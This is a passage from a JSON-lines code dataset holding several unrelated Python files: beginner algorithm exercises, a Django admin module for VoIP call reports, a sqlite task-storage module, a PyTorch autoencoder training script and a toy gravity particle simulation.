lst_1.reverse()\r\n lst.append(lst_1)\r\n return False\r\n if x > 30:\r\n lst.remove(x)\r\n lst_1.append(x)\r\n remove_item(x - 1)\r\n return lst\r\n'''\r\n\r\n\r\n\r\n# τ)\r\n# ▬▬ return a key for the specified value in dictionary.\r\n'''def get_required_item(item_1,item_2,item_3):\r\n dictionary = {\"GTX 1650\":item_1,\"RTX 2070\":item_2,\"RTX 3080\":item_3}\r\n for key,value in dictionary.items():\r\n if value:\r\n return key'''\r\n#───────────────────────────────────────────────────────────────────────────────────\r\n\r\n# Check your answer\r\n#q6.check()\r\n#print(exactly_one_topping(False,True,False))\r\n\r\n'''\r\nl = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]\r\nlst = [x for x in l if x > 4]\r\nprint(lst)'''\r\n\r\n \r\ndic = {\"GTX 1650\":2900,\"GTX 2060\":5700,\"RTX 3080\":2900}\r\nx = 2900\r\n\r\n\r\n\r\n\r\n\r\n#print(remove_item(40))\r\n\r\n\r\n\r\n#print(lst)\r\n\r\n\r\n\r\n\r\n\r\n\r\n'''\r\ndef exactly_one_topping(ketchup, mustard, onion):\r\n \"\"\"Return whether the customer wants exactly one of the three available toppings\r\n on their hot dog.\r\n \"\"\"\r\n lst = []\r\n topping_dictionary = {\"Ketchup\":ketchup,\"Mustard\":mustard,\"Onion\":onion}\r\n for key, value in topping_dictionary.items():\r\n if value == True:\r\n lst.append(key)\r\n return lst\r\nprint(exactly_one_topping(True,True,False))\r\n'''\r\n\r\n\r\n\r\ndef select_second(L):\r\n \"\"\"Return the second element of the given list. If the list has no second\r\n element, return None.\r\n \"\"\"\r\n if len(L) > 2:\r\n return L[1]\r\n else:\r\n return None\r\n\r\n\r\n\r\n","repo_name":"Mustafa-pnevma-galinis/Basic-Algorithms","sub_path":"Agorithms.py","file_name":"Agorithms.py","file_ext":"py","file_size_in_byte":11412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29970770760","text":"from django.contrib import admin\nfrom django.contrib.admin.options import IncorrectLookupParameters\nfrom django.contrib.admin.views.main import ERROR_FLAG\nfrom django.conf.urls import patterns\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.template import RequestContext\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.translation import ungettext\nfrom django.db.models import Sum, Avg, Count\nfrom dialer_cdr.models import Callrequest, VoIPCall\nfrom dialer_cdr.forms import AdminVoipSearchForm\nfrom dialer_cdr.function_def import voipcall_record_common_fun, voipcall_search_admin_form_fun\nfrom django_lets_go.common_functions import getvar\nfrom mod_utils.helper import Export_choice\nfrom genericadmin.admin import GenericAdminModelAdmin\nfrom datetime import datetime\nfrom django.utils.timezone import utc\nimport tablib\n\n\nAPP_LABEL = _('VoIP report')\n\n\nclass CallrequestAdmin(GenericAdminModelAdmin):\n\n \"\"\"\n Allows the administrator to view and modify certain attributes\n of a Callrequest.\n \"\"\"\n content_type_whitelist = ('survey/survey', )\n fieldsets = (\n (_('Standard options'), {\n 'fields': ('user', 'request_uuid', 'call_time', 'campaign',\n 'status', 'hangup_cause', 'callerid', 'phone_number',\n 'timeout', 'timelimit', 'call_type', 'aleg_gateway',\n 'content_type', 'object_id', ),\n }),\n (_('Advanced options'), {\n 'classes': ('collapse', ),\n 'fields': ('extra_data', 'extra_dial_string', 'subscriber', 'completed'),\n }),\n )\n # If we try to display user / content_type low the performance\n list_display = ('id', 'request_uuid', 'aleg_uuid', 'call_time',\n 'status', 'callerid', 'phone_number', 'call_type',\n 'completed', 'num_attempt', 'last_attempt_time', )\n raw_id_fields = ('subscriber',)\n list_display_links = ('id', 'request_uuid', )\n list_filter = ['callerid', 'call_time', 'status', 'call_type', 'campaign']\n ordering = ('-id', )\n search_fields = ('request_uuid', )\n\nadmin.site.register(Callrequest, CallrequestAdmin)\n\n\nclass VoIPCallAdmin(admin.ModelAdmin):\n\n \"\"\"\n Allows the administrator to view and modify certain attributes\n of a VoIPCall.\n \"\"\"\n can_add = False\n detail_title = _(\"Call Report\")\n list_display = ('id', 'leg_type', 'callid', 'callerid', 'phone_number',\n 'starting_date', 'min_duration', 'billsec', 'disposition',\n 'hangup_cause', 'callrequest')\n valid_lookups = ('callrequest__campaign_id', )\n raw_id_fields = ('callrequest', )\n if settings.AMD:\n list_display += ('amd_status', )\n ordering = ('-id', )\n\n def lookup_allowed(self, lookup, *args, **kwargs):\n if lookup.startswith(self.valid_lookups):\n return True\n return super(VoIPCallAdmin, self).lookup_allowed(lookup, *args, **kwargs)\n\n def user_link(self, obj):\n \"\"\"User link to user profile\"\"\"\n if obj.user.is_staff:\n url = reverse('admin:auth_staff_change', args=(obj.user_id, ))\n else:\n url = reverse('admin:auth_customer_change', args=(obj.user_id, ))\n return '%s' % (url, obj.user)\n user_link.allow_tags = True\n user_link.short_description = _('User')\n\n def used_gateway_link(self, obj):\n \"\"\"Used gateway link to edit gateway detail\"\"\"\n if obj.used_gateway:\n url = reverse('admin:dialer_gateway_gateway_change', args=(obj.used_gateway.id, ))\n return '%s' % (url, obj.used_gateway)\n used_gateway_link.allow_tags = True\n used_gateway_link.short_description = _('Gateway used')\n\n def has_add_permission(self, request):\n \"\"\"Remove add permission on VoIP Call Report model\n\n **Logic Description**:\n\n * Override django admin has_add_permission method to remove add\n permission on VoIP Call Report model\n \"\"\"\n if not self.can_add:\n return False\n return super(VoIPCallAdmin, self).has_add_permission(request)\n\n def get_urls(self):\n urls = super(VoIPCallAdmin, self).get_urls()\n my_urls = patterns('',\n (r'^$', self.admin_site.admin_view(self.changelist_view)),\n (r'^voip_daily_report/$', self.admin_site.admin_view(self.voip_daily_report)),\n (r'^export_voip_report/$', self.admin_site.admin_view(self.export_voip_report)),\n )\n return my_urls + urls\n\n def changelist_view(self, request, extra_context=None):\n \"\"\"\n Override changelist_view method of django-admin for search parameters\n\n **Attributes**:\n\n * ``form`` - AdminVoipSearchForm\n * ``template`` - admin/dialer_cdr/voipcall/change_list.html\n\n **Logic Description**:\n\n * VoIP report Record Listing with search option & Daily Call Report\n search Parameters: by date, by status and by billed.\n \"\"\"\n opts = VoIPCall._meta\n query_string = ''\n form = AdminVoipSearchForm()\n if request.method == 'POST':\n # Session variable get record set with searched option into export file\n request.session['admin_voipcall_record_kwargs'] = voipcall_record_common_fun(request)\n\n query_string = voipcall_search_admin_form_fun(request)\n return HttpResponseRedirect(\"/admin/%s/%s/?%s\" % (opts.app_label, opts.object_name.lower(), query_string))\n else:\n disposition = ''\n from_date = ''\n to_date = ''\n campaign_id = ''\n leg_type = ''\n\n from_date = getvar(request, 'starting_date__gte')\n to_date = getvar(request, 'starting_date__lte')[0:10]\n disposition = getvar(request, 'disposition__exact')\n campaign_id = getvar(request, 'callrequest__campaign_id')\n leg_type = getvar(request, 'leg_type__exact')\n\n form = AdminVoipSearchForm(initial={'disposition': disposition,\n 'from_date': from_date,\n 'to_date': to_date,\n 'campaign_id': campaign_id,\n 'leg_type': leg_type})\n\n ChangeList = self.get_changelist(request)\n try:\n cl = ChangeList(request, self.model, self.list_display,\n self.list_display_links, self.list_filter, self.date_hierarchy,\n self.search_fields, self.list_select_related,\n self.list_per_page, self.list_max_show_all, self.list_editable,\n self)\n except IncorrectLookupParameters:\n if ERROR_FLAG in request.GET.keys():\n return render_to_response('admin/invalid_setup.html', {'title': _('Database error')})\n return HttpResponseRedirect('%s?%s=1' % (request.path, ERROR_FLAG))\n\n if request.META['QUERY_STRING'] == '':\n # Default\n # Session variable get record set with searched option into export file\n request.session['admin_voipcall_record_kwargs'] = voipcall_record_common_fun(request)\n\n query_string = voipcall_search_admin_form_fun(request)\n return HttpResponseRedirect(\"/admin/%s/%s/?%s\" % (opts.app_label, opts.object_name.lower(), query_string))\n\n cl.formset = None\n\n selection_note_all = ungettext('%(total_count)s selected', 'All %(total_count)s selected', cl.result_count)\n\n ctx = {\n 'selection_note': _('0 of %(cnt)s selected') % {'cnt': len(cl.result_list)},\n 'selection_note_all': selection_note_all % {'total_count': cl.result_count},\n 'cl': cl,\n 'form': form,\n 'opts': opts,\n 'model_name': opts.object_name.lower(),\n 'app_label': APP_LABEL,\n 'title': _('call report'),\n }\n return super(VoIPCallAdmin, self).changelist_view(request, extra_context=ctx)\n\n def voip_daily_report(self, request):\n opts = VoIPCall._meta\n kwargs = {}\n if request.method == 'POST':\n form = AdminVoipSearchForm(request.POST)\n kwargs = voipcall_record_common_fun(request)\n else:\n kwargs = voipcall_record_common_fun(request)\n tday = datetime.today()\n form = AdminVoipSearchForm(initial={\"from_date\": tday.strftime(\"%Y-%m-%d\"),\n \"to_date\": tday.strftime(\"%Y-%m-%d\")})\n if len(kwargs) == 0:\n kwargs['starting_date__gte'] = datetime(tday.year, tday.month, tday.day,\n 0, 0, 0, 0).replace(tzinfo=utc)\n\n select_data = {\"starting_date\": \"SUBSTR(CAST(starting_date as CHAR(30)),1,10)\"}\n # Get Total Records from VoIPCall Report table for Daily Call Report\n total_data = VoIPCall.objects.extra(select=select_data).values('starting_date').filter(**kwargs)\\\n .annotate(Count('starting_date'))\\\n .annotate(Sum('duration'))\\\n .annotate(Avg('duration'))\\\n .order_by('-starting_date')\n\n # Following code will count total voip calls, duration\n if total_data:\n max_duration = max([x['duration__sum'] for x in total_data])\n total_duration = sum([x['duration__sum'] for x in total_data])\n total_calls = sum([x['starting_date__count'] for x in total_data])\n total_avg_duration = (sum([x['duration__avg'] for x in total_data])) / total_calls\n else:\n max_duration = 0\n total_duration = 0\n total_calls = 0\n total_avg_duration = 0\n\n ctx = RequestContext(request, {\n 'form': form,\n 'total_data': total_data,\n 'total_duration': total_duration,\n 'total_calls': total_calls,\n 'total_avg_duration': total_avg_duration,\n 'max_duration': max_duration,\n 'opts': opts,\n 'model_name': opts.object_name.lower(),\n 'app_label': APP_LABEL,\n 'title': _('call aggregate report'),\n })\n return render_to_response('admin/dialer_cdr/voipcall/voip_report.html', context_instance=ctx)\n\n def export_voip_report(self, request):\n \"\"\"Export a CSV file of VoIP call records\n\n **Important variable**:\n\n * request.session['admin_voipcall_record_kwargs'] - stores voipcall kwargs\n\n **Exported fields**: [user, callid, callerid, phone_number,\n starting_date, duration, disposition,\n used_gateway]\n \"\"\"\n # get the response object, this can be used as a stream.\n format_type = request.GET['format']\n response = HttpResponse(content_type='text/%s' % format_type)\n # force download.\n response['Content-Disposition'] = 'attachment;filename=export.%s' % format_type\n\n # super(VoIPCall_ReportAdmin, self).queryset(request)\n kwargs = request.session['admin_voipcall_record_kwargs']\n qs = VoIPCall.objects.filter(**kwargs)\n\n amd_status = ''\n if settings.AMD:\n amd_status = 'amd_status'\n\n headers = ('user', 'callid', 'callerid', 'phone_number', 'starting_date', 'duration',\n 'billsec', 'disposition', 'used_gateway', amd_status)\n\n list_val = []\n for i in qs:\n gateway_used = i.used_gateway.name if i.used_gateway else ''\n amd_status = i.amd_status if settings.AMD else ''\n\n starting_date = i.starting_date\n if format_type == Export_choice.JSON or format_type == Export_choice.XLS:\n starting_date = str(i.starting_date)\n\n list_val.append((i.user.username,\n i.callid,\n i.callerid,\n i.phone_number,\n starting_date,\n i.duration,\n i.billsec,\n i.disposition,\n gateway_used,\n amd_status))\n\n data = tablib.Dataset(*list_val, headers=headers)\n\n if format_type == Export_choice.XLS:\n response.write(data.xls)\n elif format_type == Export_choice.CSV:\n response.write(data.csv)\n elif format_type == Export_choice.JSON:\n response.write(data.json)\n\n return response\n\nadmin.site.register(VoIPCall, VoIPCallAdmin)\n","repo_name":"newfies-dialer/newfies-dialer","sub_path":"newfies/dialer_cdr/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":12938,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"50"} +{"seq_id":"9843364968","text":"import sqlite3\r\nimport os.path as Path\r\nconn = sqlite3.connect('base.db')\r\ncur = conn.cursor()\r\n\r\n\r\nSQL_SELECT_ALL = '''\r\n SELECT\r\n id, task, status\r\n FROM\r\n base\r\n'''\r\n\r\nSQL_SELECT_TASK_BY_ID = SQL_SELECT_ALL + ' WHERE id = %s'\r\n\r\nSQL_INSERT_ADD_TASK = '''\r\n INSERT INTO base (task, status)\r\n VALUES (?, ?)\r\n'''\r\n\r\nSQL_EDIT_TASK = '''\r\n UPDATE base \r\n SET task = '?', status = '?'\r\n WHERE ID = ?\r\n'''\r\n\r\nSQL_COMPLITE_TASK = '''\r\n UPDATE base \r\n SET status = 'Задача выполнена'\r\n WHERE ID = ?\r\n '''\r\n\r\nSQL_RESTART_TASK = '''\r\n UPDATE base \r\n SET status = 'Задача вернулась в работу'\r\n WHERE ID = ?\r\n'''\r\n\r\ndef dict_factory(cursor, row):\r\n d = {}\r\n print('row:', row)\r\n print('col:', cursor.description)\r\n for idx, col in enumerate(cursor.description):\r\n d[col[0]] = row[idx] \r\n return d\r\n\r\n\r\ndef connect (db_name=None):\r\n if db_name is None:\r\n db_name = ':memory:'\r\n\r\n conn = sqlite3.connect(db_name)\r\n conn.row_factory = dict_factory\r\n\r\n return conn\r\n\r\n\r\ndef initialize(conn):\r\n with conn:\r\n script_file_path = Path.join(Path.dirname(__file__), 'shema.sql')\r\n with open (script_file_path) as f:\r\n conn.executescript(f.read())\r\n\r\ndef find_all(conn):\r\n with conn:\r\n cur = conn.execute(SQL_SELECT_ALL)\r\n return cur.fetchall()\r\n\r\n\r\ndef list_task(conn):\r\n with conn:\r\n cur = conn.execute(SQL_SELECT_ALL)\r\n return c.fetchall()\r\n\r\n\r\ndef add_task(conn, task, status):\r\n with conn:\r\n cur = conn.execute(SQL_INSERT_ADD_TASK, (task, status))\r\n\r\n\r\ndef edit_task(conn, id, task, status):\r\n with conn:\r\n cur = conn.execute(SQL_EDIT_TASK, (task, status, id))\r\n\r\n\r\ndef complite_task(conn, id):\r\n with conn:\r\n cur = conn.execute(SQL_COMPLITE_TASK, id)\r\n\r\n \r\ndef restart_task(conn, id):\r\n with conn:\r\n cur = conn.execute(SQL_RESTART_TASK, id) \r\n\r\n\r\ndef exit():\r\n sys.exit(0) \r\n\r\n\r\ndef check(conn, id):\r\n with conn:\r\n cursor = conn.execute(SQL_SELECT_TASK_BY_ID, id)","repo_name":"malyshevan/proga","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74985787996","text":"import torch\nimport dataloader\nimport argparse\nimport torchvision\nimport model\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport gc\nimport itertools\nimport time\n\nimport numpy as np\nfrom skimage import data\nfrom skimage.filters import threshold_otsu\nfrom skimage.segmentation import clear_border\nfrom skimage.measure import label, regionprops\nfrom skimage.morphology import closing, square\nfrom skimage.color import label2rgb\nfrom skimage.morphology import watershed\nimport torchvision.transforms as transforms\n\nimport sklearn\nimport sklearn.decomposition\nimport random\nimport torchvision.models as models\nimport cv2\nimport multiprocessing\n\n#from apex import amp\n#amp_handle = amp.init()\n\ntorch.backends.cudnn.benchmark = True\n\nparser = argparse.ArgumentParser(description='')\n\nparser.add_argument('--dataroota', default=[\n\t'/home/lolz0r/domain/data/billted/',\n\t'/home/lolz0r/domain/data/lifeofpi/',\n\t'/home/lolz0r/coco2017/train2017/'\n\t], type=str)\n\nparser.add_argument('--nthread', default=3, type=int)\n\nparser.add_argument('--loadSize', default=600, type=int)\nparser.add_argument('--imgSize', default=512, type=int)\nparser.add_argument('--batchSize', default=12, type=int)\nparser.add_argument('--itersPerEpoch', default=10000, type=int)\n\nparser.add_argument('--encoderStep', default=64, type=int)\nparser.add_argument('--levels', default=1, type=int)\n\nopt = parser.parse_args()\n\ntrainDataset = torch.utils.data.DataLoader(dataloader.ABDataloader(opt), \n\tshuffle=True, batch_size=opt.batchSize, num_workers=opt.nthread, pin_memory=True)\nautoEncoder = model.UNet(opt).cuda()\nnetGStateDict = autoEncoder.state_dict()\n\nloadedSD = torch.load('./saves/autoEncoder--3.983832822715064.pth')\nfor k in netGStateDict.keys():\n\tprint(k)\n\tif k in loadedSD and netGStateDict[k].size() == loadedSD[k].size():\n\t\tnetGStateDict[k] = loadedSD[k]\n\t\tprint('... copied')\nautoEncoder.load_state_dict(netGStateDict )\n\nautoEncoder.cuda()\n\n#autoEncoder.load_state_dict(torch.load('/home/lolz0r/domain/linesToImg/saves/autoEncoder-0.12010071901894874.pth'))\n#autoEncoder.load_state_dict(torch.load('/home/lolz0r/domain/linesToImg/saves/autoEncoder-0.8203608310765785.pth'))\n#autoEncoder = torch.nn.DataParallel(autoEncoder, device_ids=[0, 1])\n\n#optimizerEnc = YFOptimizer(encoder.parameters())\n#optimizer = YFOptimizer(autoEncoder.parameters())\n#optimizerDecB = YFOptimizer(decoderB.parameters())\n \n#optimizer = torch.optim.SGD(autoEncoder.parameters(), lr=0.0005, momentum=0.9, nesterov=True)\noptimizer = torch.optim.Adam(autoEncoder.parameters(), lr=0.001, amsgrad=True )\n\nitercount = 0\nevalFirst = False\n\n\ndef pearsonr(x, y):\n\tmean_x = torch.mean(x)\n\tmean_y = torch.mean(y)\n\txm = x.sub(mean_x)\n\tym = y.sub(mean_y)\n\tr_num = xm.dot(ym)\n\tr_den = torch.norm(xm, 2) * torch.norm(ym, 2)\n\tr_val = r_num / r_den\n\treturn r_val\n\nclass NetPerLayer(nn.Module):\n\tdef __init__(self):\n\t\tsuper(NetPerLayer, self).__init__()\n\n\t\tnet = torchvision.models.resnet18(pretrained=True)\n\t\tnet.eval()\n\n\t\tself.nodeLevels = nn.ModuleList()\n\t\tself.nodeLevels.append(nn.Sequential(net.conv1, net.bn1, net.relu, net.maxpool))\n\t\tself.nodeLevels.append(net.layer1)\n\t\tself.nodeLevels.append(net.layer2)\n\t\tself.nodeLevels.append(net.layer3)\n\t\tself.nodeLevels.append(net.layer4)\n\t\t#self.nodeLevels.append(nn.MaxPool2d(8))\n\n\t\t\n\tdef forward(self, input):\n\t\tactivations = []\n\n\t\tx = input\n\t\tfor m in self.nodeLevels:\n\t\t\tx = m(x)\n\t\t\tactivations.append(x)\n\n\t\treturn activations\n\nsqueezeNet = NetPerLayer()\nsqueezeNet = squeezeNet.cuda()\n#squeezeNet = torch.nn.DataParallel(squeezeNet, device_ids=[0, 1])\nsqueezeNet.eval()\n\ndef runDatasetIteration(dataset, isEval, itercount):\n\n\tepochTotalLoss = 0.0\n\tepochIterationCount = 0.0\n\tprint('epoch start')\n\trepeatCount = 4\n\n\tmeanToStart =5\n\tmeanWeights = (np.linspace(0.0, 1.0, num=meanToStart+2)**2 )\n\tmeanWeights = meanWeights[1:]\n\tlastNWeights = []\n\n\tfor imgInput, imgTarget in dataset:\n\t\tfor repeat in range(2):\n\t\n\t\t\t#print(torch.max(inputA))\n\t\t\t#torchvision.utils.save_image(imgInput, 'a.png', nrow=8, padding=2, normalize=True)\n\t\t\t#torchvision.utils.save_image(imgTarget, 'adist.png', nrow=8, padding=2, normalize=True)\n\t\t\t#quit()\n\n\t\t\toptimizer.zero_grad()\n\n\t\t\timg = Variable(imgInput.cuda())\n\t\t\timgTarget = Variable(imgTarget.cuda())\n\n\t\t\ttimeModelStart = time.time()\t\n\t\t\t\n\t\t\timgOutput = autoEncoder(img)\n\n\t\t\tactivationsTarget = squeezeNet(imgTarget)\n\t\t\tactivationsOutput = squeezeNet(imgOutput)\n\n\t\t\tfeatLoss = None\n\t\t\t#for actTarget, actOutput in zip(activationsTarget[1:3], activationsOutput[1:3]):\n\t\t\tfor actTarget, actOutput in zip(activationsTarget, activationsOutput):\n\t\t\t\t#l = F.mse_loss(actTarget, actOutput)\n\t\t\t\t#l = torch.abs(actTarget - actOutput).sum()\n\t\t\t\t#l = F.l1_loss(actTarget, actOutput)\n\n\t\t\t\tl = -pearsonr(actTarget.view(-1), actOutput.view(-1))\n\t\t\t\tif featLoss is None:\n\t\t\t\t\tfeatLoss = l\n\t\t\t\telse:\n\t\t\t\t\tfeatLoss += l\n\t\t\t'''\n\t\t\tgradOutput = imgOutput[:,:, :-1,:-1] - imgOutput[:,:, 1:,1:]\n\t\t\tgradTarget = imgTarget[:,:, :-1,:-1] - imgTarget[:,:, 1:,1:]\n\t\t\tfeatLoss = F.l1_loss(gradOutput, gradTarget)\n\t\t\t'''\n\t\t\tpixelLoss = F.mse_loss(imgOutput, imgTarget )\n\t\t\tloss = featLoss +pixelLoss#+(pixelLoss*1)# + lossMSSIM# + reg_loss\n\t\t\t\n\t\t\t#loss = featLoss\n\t\t\t#loss.backward()\n\n\t\t\t#torch.nn.utils.clip_grad_norm_(autoEncoder.parameters(), 1)\n\n\t\t\tepochTotalLoss += loss.item()\n\n\t\t\ttimeModelEnd = time.time()\n\n\t\t\tprefix = ''\n\t\t\t#isEval = True\n\t\t\tif isEval:\n\t\t\t\t# swap encoders\n\t\t\t\tprefix = 'EVAL: '\n\t\t\telse:\t\n\t\t\t\tloss.backward()\n\t\t\t\t#print(loss)\n\t\t\t\t#with amp_handle.scale_loss(loss, optimizer) as scaled_loss:\n\t\t\t\t#\tscaled_loss.backward()\n\t\t\t\toptimizer.step()\n\t\t\t\n\t\t\tweights = autoEncoder.extract_parameters()\n\t\t\tlastNWeights.append(weights)\n\t\t\tif len(lastNWeights) > meanToStart:\n\t\t\t\tmeanTeacher = np.array(lastNWeights)\n\t\t\t\tmeanTeacher = np.average(meanTeacher, axis=0, weights=meanWeights).astype(np.float32)\n\t\t\t\tautoEncoder.inject_parameters(meanTeacher)\n\t\t\t\tdel lastNWeights[0]\n\t\t\t\t\n\t\t\t#print(\"{} {}: total loss: {:.4f} feat: {:.4f} model-time: {}\".format(prefix, \n\t\t\tprint(\"{} {} {}: total loss: {:.4f} (feat: {:.4f} pixel: {:.4f}) ... model-time: {:.2f}\".format(prefix, \n\t\t\t\titercount, \n\t\t\t\trepeat,\n\t\t\t\tloss.item(), \n\t\t\t\tfeatLoss.item(),\n\t\t\t\tpixelLoss.item(),\n\t\t\t\ttimeModelEnd-timeModelStart))\n\n\t\t\titercount = itercount + 1\n\t\t\tepochIterationCount = epochIterationCount + 1\n\n\t\t\tif itercount == 1 or itercount % 100 == 0:\n\n\t\t\t\t#renderedImg = imgOutput.data.cpu()\n\t\t\t\t#renderedImg[imgInput != -1] = imgInput[imgInput != -1]\n\t\t\t\t#torchvision.utils.save_image(renderedImg.data.cpu(), './images/output-{}.png'.format(itercount), nrow=8, padding=2, normalize=True)\n\n\t\t\t\toutputTensor = torch.Tensor( imgOutput.size(0) * 3,\n\t\t\t\t\timgOutput.size(1),\n\t\t\t\t\timgOutput.size(2),\n\t\t\t\t\timgOutput.size(3))\n\n\t\t\t\tb = 0\n\t\t\t\tfor i in range(0, outputTensor.size(0), 3):\n\t\t\t\t\toutputTensor[i] = imgInput[b].data.cpu()\n\t\t\t\t\toutputTensor[i+1] = imgOutput[b].data.cpu()\n\t\t\t\t\toutputTensor[i+2] = imgTarget[b].data.cpu()\n\t\t\t\t\tb += 1\n\t\t\t\t\n\t\t\t\ttorchvision.utils.save_image(outputTensor.data.cpu(), './images/output-{}.png'.format(itercount), nrow=3, padding=2, normalize=True)\n\t\t\n\tavgEpochLoss = epochTotalLoss / epochIterationCount\n\treturn avgEpochLoss, itercount\n\nwhile True:\n\tif evalFirst == False:\n\t\tprint('starting epoch:')\n\t\ttrainEpochLoss, itercount = runDatasetIteration(trainDataset, False, itercount)\n\n\t\tprint('****** TRAINING EPOCH COMPLETE ... epoch loss: {} ******'.format(trainEpochLoss))\n\n\t#encoder.eval()\n\t#testEpochLoss, itercount = runDatasetIteration(trainDataset, True, itercount)\n\t#evalFirst = False\n\n\t#print('****** TESTING EPOCH COMPLETE ... epoch loss: {} ******'.format(testEpochLoss))\n\t#torch.save(model.state_dict(), './saves/mask-dist-eval-{}.pth'.format(testEpochLoss))\n\n\tprint('saving models')\n\t#torch.save(autoEncoder.module.state_dict(), './saves/autoEncoder-{}.pth'.format(trainEpochLoss))\n\ttorch.save(autoEncoder.state_dict(), './saves/autoEncoder-{}.pth'.format(trainEpochLoss))\n\tprint('... save complete!')\n\t#torch.save(autoEncoder.state_dict(), './saves/autoEncoder-{}.pth'.format(trainEpochLoss))\n\n","repo_name":"lolz0r/ganless-hd","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8055,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"50"} +{"seq_id":"71587832474","text":"import sys\nimport random\nimport math\nimport operator\nsys.path.append('.\\PixelWall')\nfrom PixelWall import Frame,Drawing,PresetAnimations\nfrom PIL import Image, ImageDraw, ImageFilter\n\nclass ForcesOfPhysics(PresetAnimations.AnimationInstance):\n\tdef extendedInit(self):\n\t\tself.model = PH_environment()\n\t\tself.steps = 0\n\n\tdef Render(self):\n\t\tif self.steps == 0:\n\t\t\tmyP1 = PH_Particle(position = (8,00),acceleration = (0,1),mass = 200000,color = (255,0,0))\n\t\t\tmyP2 = PH_Particle(position = (10,00),acceleration = (0,0.03),mass = 2000,color = (0,0,255))\n\t\t\tself.model.addParticle(myP1)\n\t\t\tself.model.addParticle(myP2)\n\t\t\tself.model.addParticle(PH_Particle(position = (10,10),mass = 50000,color = (0,255,0),mergable = False,fixed = True))\n\t\t\tself.model.addParticle(PH_Particle(position = (15,15),mass = 500000,color = (0,255,0),mergable = True,fixed = True))\n\t\t\tself.model.addParticle(PH_Particle(position = (15,7),mass = 5000,color = (0,255,255),mergable = True,fixed = False))\n\t\telse:\n\t\t\tself.model.simulate()\n\t\tpoints = self.model.dotList()\n\t\tself.steps +=1\n\t\tfor i in points:\n\t\t\tif int(i[0][0]) < 0 or int(i[0][0]) > 27 or int(i[0][1]) <0 or int(i[0][1]) > 27:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tself.dFrame.pixel[int(i[0][0]),int(i[0][1])] = i[2]\nclass PH_ForceField():\n\tdef __init__(self,mass = 1,position = (0,0),particle = None):\n\t\tself.particle = particle\n\n\tdef apply(self,particle):\n\t\tif self.particle.ID == particle.ID:return\n\t\tdistance = PH_ForceField.distance(self.particle.position,particle.position)\n\t\tppdistance = self.particle.position-particle.position\n\t\tforce = PH_ForceField.forceOnSphere(self.particle.position,self.particle.mass,particle.position,particle.mass,distance)\n\t\tscale = force/distance\n\t\tif not self.particle.fixed:\n\t\t\tself.particle.forces -=PH_FP([scale*force*ppdistance[0],scale*force*ppdistance[1]])\n\t\tif not particle.fixed:\n\t\t\tparticle.forces += PH_FP([scale*force*ppdistance[0],scale*force*ppdistance[1]])\n\n\t@staticmethod\n\tdef forceOnSphere(p1,m1,p2,m2,distance):\n\t\treturn float(\"6.67e-11\")*10*((m1*m2)/(distance**2))\n\n\t@staticmethod\n\tdef distance(p1,p2):\n\t\treturn PH_ForceField.hyp(p1-p2)\n\n\t@staticmethod\n\tdef hyp(p):\n\t\treturn math.sqrt((p[0]**2)+(p[1]**2))\n\nclass PH_Particle():\n\tdef __init__(self,size = 1,position = (0,0),fixed = False,mass = 1,mergable = True,color = (255,255,255),acceleration = (0,0)):\n\t\tself.size = size\n\t\tself.position = PH_FP([float(position[0]),float(position[1])])\n\t\tself.fixed = fixed\n\t\tself.mass = mass\n\t\tself.forces = PH_FP([float(0),float(0)])\n\t\tself.intforces = PH_FP([float(0),float(0)])\n\t\tself.mergable = mergable\n\t\tself.color = color\n\t\tself.ID = random.uniform(1, 10)\n\t\tself.acceleration = PH_FP([float(acceleration[0]),float(acceleration[1])])\n\tdef step(self,multiplicator = 0.1):\n\t\tself.acceleration = self.acceleration + (self.forces-self.intforces)\n\t\tif not self.fixed:\n\t\t\tself.position = self.position + self.acceleration*multiplicator\n\t\tself.intforces = self.forces\n\t\tself.forces = PH_FP([float(0),float(0)])\n\nclass PH_environment():\n\tdef __init__(self):\n\t\tself.particles = []\n\t\tself.forceFields = []\n\n\tdef addField(self,field):\n\t\tself.forceFields.append(field)\n\n\tdef addParticle(self,particle):\n\t\tself.particles.append(particle)\n\t\tinitField = PH_ForceField(particle = particle)\n\t\tself.addField(initField)\n\n\tdef simulate(self):\n\t\tpMerge = []\n\t\tpForce = []\n\t\tfor (x,y) in PH_environment.powset(self.forceFields,self.particles):\n\t\t\tif (x.particle.ID,y.ID) in pForce or (y.ID,x.particle.ID) in pForce: \n\t\t\t\tcontinue\n\t\t\tif x.particle.ID == y.ID:continue\n\t\t\tx.apply(y)\t\n\t\t\tpForce.append((x.particle.ID,y.ID))\t#Save that we allready applied the force\n\t\t\tif x.particle.mergable and y.mergable:\n\t\t\t\tif PH_ForceField.distance(y.position,x.particle.position) <= 0.9:\n\t\t\t\t\tpMerge.append((x.particle,y))\n\t\t\n\t\tpDel = []\n\t\tfor (x,y) in pMerge:\n\t\t\tpDel.append(x)\n\t\t\ty.color = ((x.color[0] + y.color[0])/2,(x.color[1] + y.color[1])/2,(x.color[2] + y.color[2])/2)\n\t\t\ty.acceleration = (y.acceleration*y.mass + x.acceleration*x.mass)/(x.mass+y.mass)\n\t\t\ty.forces = ((y.forces*y.mass) + (x.forces*x.mass))/(x.mass+y.mass)\n\t\t\ty.mass += x.mass\n\t\t\ty.size +=x.size\n\t\t\ty.fixed = True if y.fixed or x.fixed else False\n\t\tself.forceFields = [field for field in self.forceFields if not field.particle in pDel]\n\t\tself.particles = [item for item in self.particles if item not in pDel]\n\t\tfor i in self.particles:\n\t\t\ti.step()\n\t@staticmethod\n\tdef powset(a,b):\n\t\tr = []\n\t\tfor i in a:\n\t\t\tfor j in b:\n\t\t\t\tr.append((i,j))\n\t\treturn r\n\tdef 